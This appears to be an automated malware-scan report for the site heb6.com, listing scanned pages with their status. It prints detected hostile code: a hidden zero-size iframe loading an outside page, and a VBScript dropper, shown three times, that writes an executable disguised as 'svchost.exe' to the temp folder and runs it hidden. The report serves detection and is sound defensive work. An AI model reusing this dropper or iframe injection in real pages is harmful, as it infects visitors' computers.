Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=heb6.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.heb6.com/ | 200 OK Content-Length: 38538 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: tool.heb6.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>¹þ¶û±õÉú»îÍø£¨¹þÁùÐÅÏ¢Éú»îÍø£© - ¹þ¶û±õʵÓÃÉú»îÐÅÏ¢ÍøÕ¾</title> <meta name="Keywords" content="¹þ¶û±õ¶þÊÖÍø,¹þ¶û±õÐÅÏ¢¸Û,¹þ¶û±õÐÅÏ¢Íø,¹þ¶û±õ ...[4576 bytes skipped]... Hidden iFrame found. size: 0x0 src: http://www.hdzjj.gov.cn/upfile/inc/const.html <iframe src=http://www.hdzjj.gov.cn/upfile/inc/const.html width=0 height=0> | ||
http://www.heb6.com/js/common.js | 200 OK Content-Length: 1836 Content-Type: application/x-javascript | clean |
http://www.heb6.com/js/hdpic.js | 404 Not Found Content-Length: 119354 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.heb6.com/test404page.js | 404 Not Found Content-Length: 119354 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.heb6.com/js/jquey.js | 404 Not Found Content-Length: 119354 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.heb6.com/js/date.js | 200 OK Content-Length: 8035 Content-Type: application/x-javascript | clean |
http://s16.cnzz.com/stat.php?id=2792924&web_id=2792924 | 200 OK Content-Length: 10072 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: heb6.com
Result:
GET / HTTP/1.1
Host: heb6.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: heb6.com
Referer: http://www.google.com/search?q=heb6.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: heb6.com
Referer: http://www.google.com/search?q=heb6.com
Result:
The result is similar to the first query. There are no suspicious redirects found.